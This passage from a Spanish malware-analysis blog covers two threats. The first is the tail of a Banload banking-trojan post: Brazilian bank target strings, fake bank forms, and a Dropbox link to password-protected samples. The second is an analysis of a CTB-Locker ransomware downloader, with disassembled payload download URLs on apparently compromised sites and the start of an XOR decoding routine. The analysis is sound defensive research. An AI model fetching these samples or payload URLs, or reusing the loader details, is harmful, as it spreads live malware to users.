<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco itaú</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itau.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itauuniclass</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banklineplus</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itaupersonnalite</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtFrame</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">El método de ofuscado ya lo vimos en entregas anteriores.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Formularios Falsos desplegados por esta amenaza.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYRrnMumAfVYv3g7p1G5yHK6GCfBQQRDJoFaFI0eg6pNWjpgjZJjEB6SP-B9qAx8PoKPlqjn5fWm9c0wGaD-W7R4TU5Ku1sdp-R9G4vBEX5Re4-U8L8GoTR9XdeQ6Jt8raDqflV5gbPE/s1600/01-bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYRrnMumAfVYv3g7p1G5yHK6GCfBQQRDJoFaFI0eg6pNWjpgjZJjEB6SP-B9qAx8PoKPlqjn5fWm9c0wGaD-W7R4TU5Ku1sdp-R9G4vBEX5Re4-U8L8GoTR9XdeQ6Jt8raDqflV5gbPE/s320/01-bancodobrasil.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKZCjsKMH87VhmSM85FRxk5YhYpIQoF6-zjd8HoQ1hyphenhyphentHcneJPi2T4PY0mkoohxR-qp953StWUXAIRYibZBtIx7SJsqFc4NLy_S-sWd35XdndzIAd0WgAuJ_TrAA7Cbh6lHELdVLi9CbA/s1600/01-bradesco.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKZCjsKMH87VhmSM85FRxk5YhYpIQoF6-zjd8HoQ1hyphenhyphentHcneJPi2T4PY0mkoohxR-qp953StWUXAIRYibZBtIx7SJsqFc4NLy_S-sWd35XdndzIAd0WgAuJ_TrAA7Cbh6lHELdVLi9CbA/s320/01-bradesco.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDcBDJJOBpS9vBdOFXEFBMiC_snWX_KAwIX7pAHhZ4rrbKlCmRAycHfNF3jWKEw-DJiRVOsikDWMbqJXBw4LBuIucWBLfCBMI8SDqY72_vFqsCIa4Xt2HEFbDi0vksgrwFxVJFDT1c974/s1600/01-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDcBDJJOBpS9vBdOFXEFBMiC_snWX_KAwIX7pAHhZ4rrbKlCmRAycHfNF3jWKEw-DJiRVOsikDWMbqJXBw4LBuIucWBLfCBMI8SDqY72_vFqsCIa4Xt2HEFbDi0vksgrwFxVJFDT1c974/s320/01-caixa.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yax4KStWrlrxpI7FNxDDZEzn5z79Y8PKS4cBKOSFcCHuRZTvgU7eeM4H9jB29sAJkNeiJyR-WmFU5XY4s6tdBgq8x0p1wtJ_-JB5JujwFnqrJfc9WWCCCf5Bz64HIyAeHH_bpEBkAE0/s1600/01-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yax4KStWrlrxpI7FNxDDZEzn5z79Y8PKS4cBKOSFcCHuRZTvgU7eeM4H9jB29sAJkNeiJyR-WmFU5XY4s6tdBgq8x0p1wtJ_-JB5JujwFnqrJfc9WWCCCf5Bz64HIyAeHH_bpEBkAE0/s320/01-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBQ-Mj534hM2H6aJb0M-ieabZm87HfyXMlkB6gYeIKwjRl1BhuO-UoE1X19SxzuDJhUe9nJImNuubJv2_MKU9G973aDLT02XZnRYzBTMKFIKAjNeUoQqrvTGy79Eul6NNwerKCi1FbjA/s1600/01-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBQ-Mj534hM2H6aJb0M-ieabZm87HfyXMlkB6gYeIKwjRl1BhuO-UoE1X19SxzuDJhUe9nJImNuubJv2_MKU9G973aDLT02XZnRYzBTMKFIKAjNeUoQqrvTGy79Eul6NNwerKCi1FbjA/s320/01-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9zKuYRjSmf8vX1CqFGbTu9fXpcK9Fp8p17p8ATLpiIKZDUs7DGNzeglP5F7smIUy4VtliMtXNLXiCz_FE5DzTTdI7BJnaSyzf-dEA416y8NTM7AJWOmEuqEKizSP7WFOQ2We2nrVb3IA/s1600/01.sicredi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9zKuYRjSmf8vX1CqFGbTu9fXpcK9Fp8p17p8ATLpiIKZDUs7DGNzeglP5F7smIUy4VtliMtXNLXiCz_FE5DzTTdI7BJnaSyzf-dEA416y8NTM7AJWOmEuqEKizSP7WFOQ2We2nrVb3IA/s320/01.sicredi.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0nCaT-ATcycJP3so0q-RB6zSWcBd6EJqnau3Rsm7xMzi1yxa203QJFkpkCEB78i7-YjzGer8hjcCLW8rDjcKzySmmM9pHaBX6Hxz1kq9Hy2VGo09xA6F6VSQfvmz-2NBuRZ61f-dx60/s1600/02-bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0nCaT-ATcycJP3so0q-RB6zSWcBd6EJqnau3Rsm7xMzi1yxa203QJFkpkCEB78i7-YjzGer8hjcCLW8rDjcKzySmmM9pHaBX6Hxz1kq9Hy2VGo09xA6F6VSQfvmz-2NBuRZ61f-dx60/s320/02-bancodobrasil.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QCH2nGgMQWcovRFt6bpu71YepE1pzhFUEfL5aMpNG2REaUemgzniQnNP6on1jMP-b_qP-vUj3b1hWdDDCg2GvqrOtiaDKHCp6Z6_7FGkcodyiOMSTbHZ-Bjf5IsTuZc3CCtFHFA8fA8/s1600/02-bradesco.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QCH2nGgMQWcovRFt6bpu71YepE1pzhFUEfL5aMpNG2REaUemgzniQnNP6on1jMP-b_qP-vUj3b1hWdDDCg2GvqrOtiaDKHCp6Z6_7FGkcodyiOMSTbHZ-Bjf5IsTuZc3CCtFHFA8fA8/s320/02-bradesco.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpxoTkM3_GX-pugd7LLdUUeBLq6WFeaQZsHjhvLJU64dvCqleF9j2pP60ecLVJZifP6d2IoYpOnBjlhJueze3762vZ_gRrXgmwP7zlprq38o4pUQ0v6i8mI-1S7XhzUA6Rti3MnroaSaA/s1600/02-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpxoTkM3_GX-pugd7LLdUUeBLq6WFeaQZsHjhvLJU64dvCqleF9j2pP60ecLVJZifP6d2IoYpOnBjlhJueze3762vZ_gRrXgmwP7zlprq38o4pUQ0v6i8mI-1S7XhzUA6Rti3MnroaSaA/s320/02-caixa.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWTthnq_gNBa0HFIZeFToI7lVqsBvCNN4J5Y2iE8Te0IZoEkElPlc8dFpwx17nmW9t2Sjv4ymbjtUS2DELGoXwExTqEPiXezAGlDUGNi3-DT-S_586jWeN1gXVoiVj9cYlveXtRcvTO0/s1600/02-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWTthnq_gNBa0HFIZeFToI7lVqsBvCNN4J5Y2iE8Te0IZoEkElPlc8dFpwx17nmW9t2Sjv4ymbjtUS2DELGoXwExTqEPiXezAGlDUGNi3-DT-S_586jWeN1gXVoiVj9cYlveXtRcvTO0/s320/02-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzLs7YoKhBmUoHdybcMS9hK5TGXqVXR7-H5ivUwNTodoBYFIbJ0s8iMc2PiUPioUkMldXvdNjjfXpy2jLcS8KJW2LLNWDj5cBmPEObAtyBHNRKQmBOfGem2Hmo_zkqvkzpF7dIswI6_0/s1600/02-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzLs7YoKhBmUoHdybcMS9hK5TGXqVXR7-H5ivUwNTodoBYFIbJ0s8iMc2PiUPioUkMldXvdNjjfXpy2jLcS8KJW2LLNWDj5cBmPEObAtyBHNRKQmBOfGem2Hmo_zkqvkzpF7dIswI6_0/s320/02-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZOla9IJzX6GdftCZBEtaDWSWuhaEc3xvH50Xd1L8_XB2HA1tqC0f_8hFLvkIGydzEaXZbs33PjPL6oZ2VftjdHfDH3wab06EJmNOvKraUAqvnCbPAvFhTtGUoOZml1vjeJXN7XrfDXhc/s1600/03-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZOla9IJzX6GdftCZBEtaDWSWuhaEc3xvH50Xd1L8_XB2HA1tqC0f_8hFLvkIGydzEaXZbs33PjPL6oZ2VftjdHfDH3wab06EJmNOvKraUAqvnCbPAvFhTtGUoOZml1vjeJXN7XrfDXhc/s320/03-caixa.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkTzrswHzm32axDaxo4Wg9-7PL2dRu0jN8bqTUhITFaTJchRMu8oVhqiIYgwQtinALK-l_kKgsfeH00Q-NdhIQL4Ooulxd_8vdmkvwBPuBwUAGmmuLbNqmyhGx76KKtLI5AAcSw-aAep8/s1600/03-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkTzrswHzm32axDaxo4Wg9-7PL2dRu0jN8bqTUhITFaTJchRMu8oVhqiIYgwQtinALK-l_kKgsfeH00Q-NdhIQL4Ooulxd_8vdmkvwBPuBwUAGmmuLbNqmyhGx76KKtLI5AAcSw-aAep8/s320/03-itau.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cWUWiCXzGae80jAEnltZDDLrfToC4tjj470cgDLgBSdn0dU6q6-5aOTlmTWTTllgTXwVxVhKzd6sGzExxkjvU-cvO72SVhI03ros1ts0wBIog2R2Wf0lKECASd1cmMv9p6L0lAraqLc/s1600/03-santander.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cWUWiCXzGae80jAEnltZDDLrfToC4tjj470cgDLgBSdn0dU6q6-5aOTlmTWTTllgTXwVxVhKzd6sGzExxkjvU-cvO72SVhI03ros1ts0wBIog2R2Wf0lKECASd1cmMv9p6L0lAraqLc/s320/03-santander.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGPpZojPnnZ0071G3HA_8gxjkW1Pg7Dbej94VwFFmXlIi3ppc0ThbEtC5j6gKIm4dbDsK6X4C_O3ibLWIDzzopeGgs6ArbqoxNc3nk3bOnXiqumvC1iUWeGbUmYcV-WifGZIVH70aFL40/s1600/04-itau.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGPpZojPnnZ0071G3HA_8gxjkW1Pg7Dbej94VwFFmXlIi3ppc0ThbEtC5j6gKIm4dbDsK6X4C_O3ibLWIDzzopeGgs6ArbqoxNc3nk3bOnXiqumvC1iUWeGbUmYcV-WifGZIVH70aFL40/s320/04-itau.jpg" width="320" /></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Mustras: https://www.dropbox.com/s/un61utogo6d2px9/Banload-9-06-15.zip?dl=0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">password = infected</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Es todo por el momento.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2015</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-90156521900375899782015-01-24T12:27:00.001-08:002015-01-29T07:46:55.015-08:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>Campaña de Ransowware CTB-Locker.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">La semana pasada se realizo una fuerte campaña del Ransomware CTB-Locker, los correos maliciosos fueron dirigidos a varias cuentas de latinoamerica, lo curioso y a la vez cómico es que los correos estaban redactados en distintos idiomas como ser árabe, alemán e ingles, así y todo, muchas personas ejecutaron los adjuntos...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Pueden leer <a href="http://www.welivesecurity.com/la-es/2015/01/20/ctb-locker-ransomware-ataca-nuevo/">aquí</a> un aviso de ESET sobre esta campaña. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTKsJ9N0zJWhcYk-6ixh9XitwTh4HzWeglOgYuaH_9GLqBUZAIh8N0uuzB-kzlIX_LCmMofSkElXbH_Gj1BeBejI3xXQBX2IKVxNofFMyB9WNDb5Sxg309Btwkrer8pF2F_dScTAK3KY/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSTKsJ9N0zJWhcYk-6ixh9XitwTh4HzWeglOgYuaH_9GLqBUZAIh8N0uuzB-kzlIX_LCmMofSkElXbH_Gj1BeBejI3xXQBX2IKVxNofFMyB9WNDb5Sxg309Btwkrer8pF2F_dScTAK3KY/s1600/fake.jpg" height="320" width="305" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Así se veían los correos maliciosos, Gracias a Raul por las muestras.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">El ejecutable se trata de un scr que tiene una capa de un crypter no muy elaborado.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en VT del Dump, del downloader.</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTt39tunMATKvC2I4Bofqx4ZtckRd1zFpZaK08XlSeKsWWd3RbF7w4_0N2qBcwicaJsMmmMtqpPKtSGwHtRv34y4Im6GELqVkYJ9321QCgDm8CoMswJ7eXlqFxNcPtN-ULrfGJUlR7q2U/s1600/VT01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTt39tunMATKvC2I4Bofqx4ZtckRd1zFpZaK08XlSeKsWWd3RbF7w4_0N2qBcwicaJsMmmMtqpPKtSGwHtRv34y4Im6GELqVkYJ9321QCgDm8CoMswJ7eXlqFxNcPtN-ULrfGJUlR7q2U/s1600/VT01.jpg" height="115" width="400" /></a></div>
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">El downloader se conecta a los siguientes sitios para bajar el payload (ctb-Locker). con el siguiente </span><span style="font-family: Arial, Helvetica, sans-serif;">User-Agent</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">UNICODE <b>"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ6625ZWaoQ_bM_bFJjrekoWTRgaYbzcYaTg8IBzafmvQco58ouRgOd7klXNE4iyRDSHl5QSqvGl3G278XFHdXZMxWKAS7Dx_q1nYO1CEEh2ZCBfRN-tvu_3fYQ1-jteDynkPklrriD_k/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ6625ZWaoQ_bM_bFJjrekoWTRgaYbzcYaTg8IBzafmvQco58ouRgOd7klXNE4iyRDSHl5QSqvGl3G278XFHdXZMxWKAS7Dx_q1nYO1CEEh2ZCBfRN-tvu_3fYQ1-jteDynkPklrriD_k/s1600/01.png" height="285" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014AD MOV DWORD PTR SS:[EBP-38],Dumped.004010B UNICODE "voigt-its.de/fit/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014B4 MOV DWORD PTR SS:[EBP-30],Dumped.004010F UNICODE "maisondessources.com/assets/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014BB MOV DWORD PTR SS:[EBP-28],Dumped.0040114 UNICODE "jbmsystem.fr/jb/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014C2 MOV DWORD PTR SS:[EBP-20],Dumped.0040117 UNICODE "pleiade.asso.fr/piwigotest/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004014C9 MOV DWORD PTR SS:[EBP-18],Dumped.004011C UNICODE "scolapedia.org/histoiredesarts/pack.tar.gz"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Mensaje falso mostrado por el downloader para despistar a la victima que lo ejecuta, este archivo se encuentra en los recursos del ejecutable como un .rtf</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh26-md7ObX8ESeq_VIw_tx5Ub1pMzMMWQYy6tMkE4TBpfZ7HwFmAw0AwDOr_v18cwjk4fk6DTQF_-IgvYkPgqPzLoSM9xFnMiyoOCEJCnHzr2qTRLBDVuBYpzelSxmGS88rFX_E2kdzF0/s1600/mensajefake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh26-md7ObX8ESeq_VIw_tx5Ub1pMzMMWQYy6tMkE4TBpfZ7HwFmAw0AwDOr_v18cwjk4fk6DTQF_-IgvYkPgqPzLoSM9xFnMiyoOCEJCnHzr2qTRLBDVuBYpzelSxmGS88rFX_E2kdzF0/s1600/mensajefake.jpg" height="302" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Analisis dinámico de las conexiones</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El downloader descarga la carga maliciosa mediante https y a su vez hace conexiones al windows update para engañarnos un poco. (<b>en realidad lo hace para saber si tenemos conexión a internet .- Gracias MOC por la aclaración</b>.)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004016C3 PUSH Dumped.00401258 UNICODE "windowsupdate.microsoft.com/"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmP8HvWYYwWjuOF9nXmYpQWIyF4ejick4QkMCib9DhceNdAJm1eu9sZLaEJ5VaSESimKEX3Kgv6gWESSc-ti3iZDx_iYbmxcppUN8syX-5ArHN3x1pHe_YyoU8aw7vtIW2wU4jcFOw1OQ/s1600/trafico+Wupdate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmP8HvWYYwWjuOF9nXmYpQWIyF4ejick4QkMCib9DhceNdAJm1eu9sZLaEJ5VaSESimKEX3Kgv6gWESSc-ti3iZDx_iYbmxcppUN8syX-5ArHN3x1pHe_YyoU8aw7vtIW2wU4jcFOw1OQ/s1600/trafico+Wupdate.jpg" height="193" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJzIeFbQtj_Ermq-rtOXZ_SRJ0UA-61LOJuxeemplezQupHprnttMDtxfreuwGzE3viVcZt4i-ZKX7sHNb88SSCwBP4eari6ise1iTA3E8pV7tjAIZ25AQUjqXIVJk7ltBuRenElEPYY/s1600/trafico+443.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJzIeFbQtj_Ermq-rtOXZ_SRJ0UA-61LOJuxeemplezQupHprnttMDtxfreuwGzE3viVcZt4i-ZKX7sHNb88SSCwBP4eari6ise1iTA3E8pV7tjAIZ25AQUjqXIVJk7ltBuRenElEPYY/s1600/trafico+443.jpg" height="178" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">El Archivo descargado no se trata de un tar.gz, se encuentra codificado, pasa por la siguiente rutina XOR para decodificarlo y grabarlo en disco como un ejecutable.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040179E /$ 55 PUSH EBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040179F |. 8BEC MOV EBP,ESP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A1 |. 83EC 10 SUB ESP,10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A4 |. 53 PUSH EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A5 |. 57 PUSH EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A6 |. 33DB XOR EBX,EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017A8 |. 33FF XOR EDI,EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017AA |. C645 F0 20 MOV BYTE PTR SS:[EBP-10],20</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017AE |. C645 F1 21 MOV BYTE PTR SS:[EBP-F],21</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017B2 |. C645 F2 05 MOV BYTE PTR SS:[EBP-E],5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017B6 |. C645 F3 50 MOV BYTE PTR SS:[EBP-D],50</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017BA |. C645 F4 77 MOV BYTE PTR SS:[EBP-C],77</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017BE |. C645 F5 1B MOV BYTE PTR SS:[EBP-B],1B</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017C2 |. C645 F6 51 MOV BYTE PTR SS:[EBP-A],51</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017C6 |. C645 F7 FA MOV BYTE PTR SS:[EBP-9],0FA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017CA |. C645 F8 0E MOV BYTE PTR SS:[EBP-8],0E</span><br />
